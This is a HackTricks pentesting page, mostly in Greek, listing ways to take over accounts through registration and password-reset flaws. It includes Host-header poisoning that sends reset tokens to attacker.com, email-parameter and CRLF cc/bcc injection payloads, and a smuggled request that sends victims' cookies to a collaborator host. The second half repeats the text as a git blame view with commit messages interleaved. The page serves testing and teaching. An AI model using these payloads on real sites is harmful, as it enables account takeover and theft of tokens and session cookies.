hacktricks/pentesting-web/registration-vulnerabilities.md

# Registration & Takeover Vulnerabilities

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


## Registration Takeover

### Duplicate Registration

* Προσπαθήστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
* Ελέγξτε ποικιλία στο email:
* κεφαλαία
* \+1@
* προσθέστε κάποιο τελεία στο email
* ειδικούς χαρακτήρες στο όνομα email (%00, %09, %20)
* Βάλτε μαύρους χαρακτήρες μετά το email: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com

### Username Enumeration

Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.

### Password Policy

Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικών πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς).\
Σε αυτή την περίπτωση μπορείτε να προσπαθήσετε να κάνετε bruteforce τα διαπιστευτήρια.

### SQL Injection

[**Check this page** ](sql-injection/#insert-statement)για να μάθετε πώς να προσπαθήσετε να αναλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω **SQL Injections** σε φόρμες καταχώρησης.

### Oauth Takeovers

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

### SAML Vulnerabilities

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

### Change Email

Όταν καταχωρηθείτε προσπαθήστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή επικυρώνεται σωστά ή αν μπορείτε να την αλλάξετε σε αυθαίρετα emails.

### More Checks

* Ελέγξτε αν μπορείτε να χρησιμοποιήσετε **disposable emails**
* **Μακρύς** **κωδικός** (>200) οδηγεί σε **DoS**
* **Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμών**
* Χρησιμοποιήστε username@**burp\_collab**.net και αναλύστε το **callback**

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
2. Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού πρόσβασης
3. Μην αλλάξετε τον κωδικό
4. Κάντε κλικ σε οποιαδήποτε 3η ιστοσελίδα (π.χ.: Facebook, twitter)
5. Παρεμβάλετε το αίτημα στο Burp Suite proxy
6. Ελέγξτε αν η κεφαλίδα referer διαρρέει το token επαναφοράς κωδικού πρόσβασης.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Παρεμβάλετε το αίτημα επαναφοράς κωδικού πρόσβασης στο Burp Suite
2. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού πρόσβασης με βάση την _κεφαλίδα host_ όπως : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στη λειτουργία **Αλλαγή κωδικού**.
2. Ξεκινήστε το Burp Suite και παγώστε το αίτημα.
3. Στείλτε το στην καρτέλα επαναλήπτη και επεξεργαστείτε τις παραμέτρους: User ID/email\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`

### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Το token επαναφοράς κωδικού πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.\
Δοκιμάστε να προσδιορίσετε αν το token λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.

* Χρονική σήμανση
* UserID
* Email του χρήστη
* Όνομα και Επώνυμο
* Ημερομηνία Γέννησης
* Κρυπτογραφία
* Μόνο αριθμοί
* Μικρή ακολουθία token (χαρακτήρες μεταξύ \[A-Z,a-z,0-9])
* Επαναχρησιμοποίηση token
* Ημερομηνία λήξης token

### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Προκαλέστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για μια συγκεκριμένη διεύθυνση email π.χ: test@mail.com
2. Εξετάστε την απάντηση του διακομιστή και ελέγξτε για `resetToken`
3. Στη συνέχεια, χρησιμοποιήστε το token σε μια διεύθυνση URL όπως `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`

### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά διαστήματα πριν και/ή μετά το όνομα χρήστη. π.χ: `"admin "`
2. Ζητήστε μια επαναφορά κωδικού με το κακόβουλο όνομα χρήστη σας.
3. Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό του θύματος.
4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.

Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση.\
Δείτε: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Βρείτε ένα XSS μέσα στην εφαρμογή ή σε μια υποτομέα αν τα cookies είναι περιορισμένα στον γονικό τομέα: `*.domain.com`
2. Διαρρεύστε το τρέχον **cookie συνεδρίας**
3. Αυθεντικοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie

### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. Χρησιμοποιήστε **smuggler** για να ανιχνεύσετε τον τύπο HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα παρακάτω δεδομένα:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` με στόχο να ανοίξετε ανακατεύθυνση των θυμάτων στο burpcollab και να κλέψετε τα cookies τους\
3\. Το τελικό αίτημα θα μπορούσε να μοιάζει με το εξής
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
Hackerone reports exploiting this bug\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

### Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. Δημιουργήστε ένα payload για το CSRF, π.χ: “HTML φόρμα με αυτόματη υποβολή για αλλαγή κωδικού”
2. Στείλτε το payload

### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

Το JSON Web Token μπορεί να χρησιμοποιηθεί για την αυθεντικοποίηση ενός χρήστη.

* Επεξεργαστείτε το JWT με άλλο User ID / Email
* Ελέγξτε για αδύναμη υπογραφή JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

## References

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)


{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								# Registration & Takeover Vulnerabilities
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								{% hint style="success" %}
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								<summary>Support HackTricks</summary>
-												a

											
										
										
											2024-02-03 14:45:32 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								## Registration Takeover
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Duplicate Registration
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								* Προσπαθήστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
 								* Ελέγξτε ποικιλία στο email:
 								* κεφαλαία
 								* \+1@
 								* προσθέστε κάποιο τελεία στο email
 								* ειδικούς χαρακτήρες στο όνομα email (%00, %09, %20)
 								* Βάλτε μαύρους χαρακτήρες μετά το email: `test@test.com a`
 								* victim@gmail.com@attacker.com
 								* victim@attacker.com@gmail.com
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Username Enumeration
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Password Policy
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικών πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς).\
 								Σε αυτή την περίπτωση μπορείτε να προσπαθήσετε να κάνετε bruteforce τα διαπιστευτήρια.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### SQL Injection
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								[**Check this page** ](sql-injection/#insert-statement)για να μάθετε πώς να προσπαθήσετε να αναλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω **SQL Injections** σε φόρμες καταχώρησης.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Oauth Takeovers
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GITBOOK-3788: No subject

											
										
										
											2023-02-16 18:26:56 +00:00
+								{% content-ref url="oauth-to-account-takeover.md" %}
 								[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### SAML Vulnerabilities
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="saml-attacks/" %}
 								[saml-attacks](saml-attacks/)
 								{% endcontent-ref %}
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Change Email
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								Όταν καταχωρηθείτε προσπαθήστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή επικυρώνεται σωστά ή αν μπορείτε να την αλλάξετε σε αυθαίρετα emails.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### More Checks
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								* Ελέγξτε αν μπορείτε να χρησιμοποιήσετε **disposable emails**
 								* **Μακρύς** **κωδικός** (>200) οδηγεί σε **DoS**
 								* **Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμών**
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
+								* Χρησιμοποιήστε username@**burp\_collab**.net και αναλύστε το **callback**
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								## **Password Reset Takeover**
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
 . Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού πρόσβασης
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
+. Μην αλλάξετε τον κωδικό
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Κάντε κλικ σε οποιαδήποτε 3η ιστοσελίδα (π.χ.: Facebook, twitter)
 . Παρεμβάλετε το αίτημα στο Burp Suite proxy
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Ελέγξτε αν η κεφαλίδα referer διαρρέει το token επαναφοράς κωδικού πρόσβασης.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Παρεμβάλετε το αίτημα επαναφοράς κωδικού πρόσβασης στο Burp Suite
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
+. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα\
 								`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού πρόσβασης με βάση την _κεφαλίδα host_ όπως : `https://attacker.com/reset-password.php?token=TOKEN`
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								```powershell
 								# parameter pollution
 								email=victim@mail.com&email=hacker@mail.com
 								# array of emails
 								{"email":["victim@mail.com","hacker@mail.com"]}
 								# carbon copy
 								email=victim@mail.com%0A%0Dcc:hacker@mail.com
 								email=victim@mail.com%0A%0Dbcc:hacker@mail.com
 								# separator
 								email=victim@mail.com,hacker@mail.com
 								email=victim@mail.com%20hacker@mail.com
 								email=victim@mail.com|hacker@mail.com
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στη λειτουργία **Αλλαγή κωδικού**.
 . Ξεκινήστε το Burp Suite και παγώστε το αίτημα.
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Στείλτε το στην καρτέλα επαναλήπτη και επεξεργαστείτε τις παραμέτρους: User ID/email\
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								Το token επαναφοράς κωδικού πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.\
 								Δοκιμάστε να προσδιορίσετε αν το token λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								* Χρονική σήμανση
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								* UserID
 								* Email του χρήστη
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 04:11:25 +00:00
+								* Όνομα και Επώνυμο
 								* Ημερομηνία Γέννησης
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								* Κρυπτογραφία
 								* Μόνο αριθμοί
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								* Μικρή ακολουθία token (χαρακτήρες μεταξύ \[A-Z,a-z,0-9])
 								* Επαναχρησιμοποίηση token
 								* Ημερομηνία λήξης token
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Προκαλέστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για μια συγκεκριμένη διεύθυνση email π.χ: test@mail.com
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Εξετάστε την απάντηση του διακομιστή και ελέγξτε για `resetToken`
 . Στη συνέχεια, χρησιμοποιήστε το token σε μια διεύθυνση URL όπως `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά διαστήματα πριν και/ή μετά το όνομα χρήστη. π.χ: `"admin "`
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+. Ζητήστε μια επαναφορά κωδικού με το κακόβουλο όνομα χρήστη σας.
 . Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό του θύματος.
 . Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-09-04 13:40:55 +00:00
+								Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση.\
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								Δείτε: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Βρείτε ένα XSS μέσα στην εφαρμογή ή σε μια υποτομέα αν τα cookies είναι περιορισμένα στον γονικό τομέα: `*.domain.com`
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+. Διαρρεύστε το τρέχον **cookie συνεδρίας**
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+. Αυθεντικοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+								### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:35:17 +00:00
+\. Χρησιμοποιήστε **smuggler** για να ανιχνεύσετε τον τύπο HTTP Request Smuggling (CL, TE, CL.TE)\
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
